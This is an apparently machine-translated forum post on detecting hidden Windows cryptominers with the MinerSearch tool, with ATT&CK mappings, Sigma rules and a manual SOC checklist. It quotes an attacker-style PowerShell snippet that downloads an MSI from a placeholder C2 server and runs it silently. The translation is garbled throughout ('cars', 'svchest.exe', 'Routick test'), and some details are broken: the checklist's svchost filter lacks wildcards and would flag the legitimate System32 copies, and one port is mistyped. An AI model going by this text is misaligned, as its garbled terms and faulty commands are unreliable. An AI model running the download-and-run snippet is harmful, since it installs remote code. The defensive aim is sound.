MinerSearch: Miner detection in Windows - from manual analysis to automatic removal

Depov

Moderator
Staff member
MODERATOR
ULTIMATE
SUPREME
PREMIUM
MEMBER
Joined
Feb 18, 2025
Messages
136
Reaction score
145
Deposit
0$
Business logic of hidden mining: why is it an intruder
The hidden miner is one of the “quiet” threats. Unlike a ransomware that claims to itself, the cryptominer generates a stable passive income for months. The scheme is simple: infect the maximum of cars, to mine Monero (XMR) through pools, minimize noise.

The financial impact for the victim is far from symbolic. On servers - the growth of electricity bills and degradation of SLA. Terminal servers - user complaints about brakes. On workstations - accelerated depreciation of the GPU and power supplies. Individual families (for example, Smominru) combine mining with DDoS and proxy traffic, turning the machine into a part of the botnet infrastructure.

A typical kill chain of hidden miner on Windows:
1. Initial Access - phishing, pirated software, exploiting vulnerabilities in the public service (Exploit Public-Facting Application, T1190)
2. Execution - launching the downloader via PowerShell, cmd or Windows Installer (MSI)
3. Persistence - creation of service, tasks in the planner (Scheduled Task, T1053.005), entry in the Run-key logs
4. Defense Evasion - masking for system process (Masquerading, T1036), obfuscation (Decode files or Information, T1140), injection in svchest.exe
5. Discovery - Search for competing miners via network connections (System Network Connections Discovery, T1049)
6. Impact - XMRig / lolMiner launch and connection to the pool
MinerSearch works in stages 3-5: checks the traces of fixation, searches for disguised processes and files, analyzes the startup points.
How a hidden miner is fixed in Windows: MITRE ATT&CK
Masquerading - masking for system processes (T1036)
The most common technique is the renaming of the miner binary in svchost.exe, conhost.exe, csrss.exe and accommodation in non-standard directories. The Real svchost.exe is launched only from C:\Windows\System32\, and its parental process - services.exe. Any deviation is a red flag.

[Applicable to: Windows 10/11, internal pentest / IR]

According to Trend Micro, the family of Coinminer.Win32. MALXMR uses Windows Installer (MSI) to deliver and places files in %AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server. After installation, three svchest.exe processes are created to inject malicious code: two work as a watchdog (reboot the miner at completion), the third performs mining. This complicates the removal: you kill one process - watchdog will take it in seconds.

In the LOLBAS catalog several legitimate Windows-witts are suitable for masquerading - for example, Diantz.exe and Makecab.exe (both tagged for T1036). Atomic Red Team has a ready-made “System File Copied to Unusual Location” (PowerShell, Windows): it copies the system file to a non-standard directory, playing exactly the behavior that MinerSerarch is looking for when scanning the file system.

D3FEND: File Analysis (D3-FA), File Integration Monitoring (D3-FIM) and Dynamic Analysis (D3-DA) are all three aimed at detecting executable camouflage.
Bodywork and delivery of payload (T1140)
Miners are delivered in a coded form. Windows is often used for decoding certutil.exe -decode - a staff utility for working with certificates, entered in the LOLBAS catalog as a tool for Deobfuscate / Decode Files or Information (T1140). In the case of Coinminer.Win32. MALXMR luggness masked the ZIP archive under the icon file (icon.ico), and the loader was inside (default.ocx) and encrypted mining module (default.bin)

Watchdog processes use PowerShell to reload the MSI file when the miner is completed:
Code:

$cli = New-Object System.Net.WebClient
$cli.Headers['User-Agent'] = 'Windows Installer'
$f = "$env:TEMP\payload.msi"
$cli.DownloadFile('https://<C2-server>/update.txt', $f)
Start-Process $f -ArgumentList '/q'
Detect of this pattern is possible through the Sigma rule proc_creation_win_powershell_base64_frombase64string.yml from SigmaHQ - it catches the use FromBase64String in the arguments of PowerShell. Rule proc_creation_win_certutil_susp_execution.yml Catches suspicious calls to certutil.
Consolidation: services and task scheduler
[Applicable to: Windows 10/11, IR / threat hunting]

On Windows, miners are fixed through three main vectors:
• Scheduled Tasks (T1053.005) - tasks in the planner with the launch of binary from non-standard paths (%TEMP%, %AppData%)
• Windows Services - Service Registration without Valid Digital Signature
• Regent's Run Keys - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runand similar branches
MinerSearch checks all three vectors. For services, the digital signature verification is applied: there is no signature or notable - the service is marked as suspicious. There is a nuance: rare legitimate services are also without a signature. Therefore, MinerSearch divides the results into “remote” (convention of the signature) and “quarantine” (sense) – so that false positives can be restored.

Cryptominers on Linux use other fixing mechanisms - in particular, cron jobs. The T1053.003 (Cron) technique is applicable exclusively to Linux/macOS. Red Canary study by Rocke group shows how attackers place scripts /etc/cron.hourly/, /etc/cron.daily/ and directly edit crontab files. MinerSearch to Linux is not applicable - this is exclusively a Windows tool.
MinerSerarch: tool architecture and what it checks

Adjustments to the environment
• OS: Windows 10 / Windows 11 (Windows 7/8 - with restrictions)
• . NET Framework: version 4.7.1 or newer (preinstalled in Windows 10/11)
• Privileges: launch strictly on behalf of the administrator
• Mode: normal Windows download (NOT secure mode)
• RAM: runs on machines from 2 GB, no additional resources require
• Antivirus: Microsoft Defender, Kaspersky Endpoint Security and others can block MinerSerarch - the utility makes changes to the registry and file system. Solution: Temporarily Add to Exceptions (Analysed)
• Network: no required - completely offline scanning
Scanning Stages - What Happens Under the hood
1. Routick test. Search for roots of the level of the core, able to hide processes from the task manager. If the rootkite sits in the system - all the other checks are meaningless, the miner simply will not be visible.
2. Analysis of advanced processes. Checking the active processes on masquerading: a discrepancy between the name and a path to the binary, the launch of uncharacteristic directories. Suspicious processes are forcibly completed.
3. Scanning the file system. Bypass of typical directories of placement of miners: %TEMP%, %AppData%, C:\ProgramData. The files are compared with the signals XMRig, loMiner, Phoenix Miner and other famous miners.
4. Analysis of the registry. Checking Run keys and other startup points.
5. Verification of the task scheduler. Search for tasks with the way to binary of non-standard directories.
6. Inspection of services. Verification of digital signatures. Without a valid signature - the service is marked as suspicious.
7. Signature scanning. Complete bypassing executable files on the system disk.
The result of each stage is displayed in the console: “No threats found” or “Found threats: N”. The detailed log is stored in C:\_MinerSearch_Logs\.
Parameters for point checks
For blue team, you often need the opportunity to conduct a scan without automatic treatment - first study the report, then make a decision. MinerSearch supports granular control via flags: --no-rootkit-check, --no-runtime, --no-services, --no-signature-scan. You can combine in any order, the register is not important.

Files defined as suspicious (but not confirmed by signatures) are placed in the folder minersearch_quarantine next to the executable file. Malicious files (convention by signature) are deleted without a request. After the scan is completed, be sure to check the quarantine - there can get a legitimate software without signature.
Manual detection of cryptominer: step-by-step checklist
MinerSearch is a good first step, but an experienced analyst needs to be able to find a miner with his hands. The algorithm below does not depend on the specific instrument.

Step 1: Analysis of processes. Open Process Explorer (Sysinternals) and sort by CPU. Looking for: loading processes >50% for no apparent reason, svchost.exe without parental services.exe, executable files from %TEMP% and %AppData%, processes without the field of Company Name. Quick check in PowerShell:
Code:

Get-Process svchost -ErrorAction SilentlyContinue |
Where-Object {$_.Path -notlike "*System32*"} |
Select-Object Id, Path, CPU


Get-NetTCPConnection -State Established |
Where-Object {$_.RemotePort -in 3333,4444,5555,14444,14433} |
Select-Object OwningProcess, RemoteAddress, RemotePort
If the first team returns the non-empty result - this is an anomaly: the legitimate svchast.exe is launched only from C:\Windows\System32\. If the second found a connection - determine the PID through Get-Process -Id <PID> | Select-Object Path and check the binary.

Step 2: checking the autoload. We launch Autoruns (Sysinternals) and see: recordings without digital signature (highlighted by yellow), the tasks of the planner with the way to the binary outside C:\Windows\ and C:\Program Files\, services with ImagePath in non-standard directories.

Step 3: Sysmon and Windows Event Log. If Sysmon is installed (and for SOC it is a must-have), check three types of events. Event ID 1 (Process Create) - Looking for Processes from Temporary Directories with arguments containing --config, --url, stratum+tcp://. Event ID 3 (Network Connection) - connections to pool ports (3333, 4444, 5555). Event ID 7 (Image Loaded) - downloading DLL from non-standard paths to svchost.exe.

Without Sysmon, analysis is very limited: standard Windows logs do not log command line processes and network connections with sufficient detail. In SigmaHQ there are ready-made rules for detect: posh_pm_susp_get_nettcpconnection.yml to monitor suspicious calls Get-NetTCPConnectionand the rule proc_creation_win_net_use_network_connections_discovery.yml Tracks the reconnaissance of network connections.

Step 4: Re-check after reboot. If the miner is found and removed, reboot the machine and repeat steps 1-2. Watchdog mechanisms can recover from the miner from the backup or re-make it from the C2 server.
MinerSearch Restrictions and When It Isn't Enough
1. Only Windows. Linux servers, where cryptomingers are also common (especially through vulnerabilities in Redis, Weblogic, Apache Struts - Exploit Public-Facting Application, T1190), MinerSearch does not cover. Linux needs other tools: rkhunter, chkrootkitmanual analysis of cron jobs and /proc.
2. The signature base is limited. New or modified mining options that are not in the database can fly by. MinerSearch complements the signature approach with behavioral checks (ways, signatures, rootkits), but does not replace a full EDR. For the enterprise-level of the cryptofinger detectment, there are ML approaches - for example, Sysdig describes a classification model based on runtime analysis syscals with an emphasis on minimizing false positives.
3. False positives. Corporate services without digital signature can be stopped. Always study the log and check the quarantine before the production use.
4. Does not detect web miners. Cryptojacking through JavaScript (former CoinHive and analogues) - outside the MinerSearch area.
5. It doesn't scale. It's a utility for one car. To check the host park, you need Velociraptor, SCCM with custom scripts or EDR with detect rules.
6. The antivirus can block MinerSearch. On the infected machine, the miner can further block the downloading of safety nets - according to remontka.pro, in this case, the AV Block Remover or loading with Kaspersky Rescue Disk helps.
How MinerSearch is different from antivirus scanners

1782683365378.png

When to use MinerSearch: suspicion of cryptominer, antivirus does not cope, you need a deep check of fixation mechanisms (registry, services, planner).

When MinerSearch isn't enough: infection with a complex malware (encryptor + miner), you need to check dozens of hosts, Linux environment, you need an ML detection of unknown families.
Ready-made checklist for SOC: search for a hidden miner
Numbered list for inclusion in IR-playbook:
1. Check the CPU/GPU boot in Task Manager - anomaly >50% downtime
2. Run a masquerading check: Get-Process svchost | Where-Object {$_.Path -notlike "System32"}
3. Check the network connections with pools on ports 3333, 4444, 5555, 1444
4. Start Autoruns - check the startup, services without signature, scheduler's tasks
5. Download MinerSearch with GitHub (BlendLog/MinerSearch), run on behalf of the administrator
6. Study the Log in C:\_MinerSearch_Logs\- records marked "Found threats"
7. Check the quarantine minersearch_quarantine- to eliminate false positives
8. Reboot the machine and repeat the steps 1-3 - to make sure that the watchdog did not restore the miner
9. Check Sysmon (Event ID 1, 3, 7) in the last 30 days - determine the moment of primary infection
10. Run KVRT or Dr.Web CureIt! to search for related malware
 
Top Bottom